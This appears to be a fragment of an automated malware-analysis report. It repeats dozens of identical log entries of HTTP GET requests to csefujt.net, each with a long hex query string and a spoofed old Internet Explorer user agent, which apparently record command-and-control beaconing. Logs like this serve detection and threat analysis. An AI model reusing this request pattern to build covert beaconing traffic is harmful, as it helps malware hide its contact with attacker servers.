                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
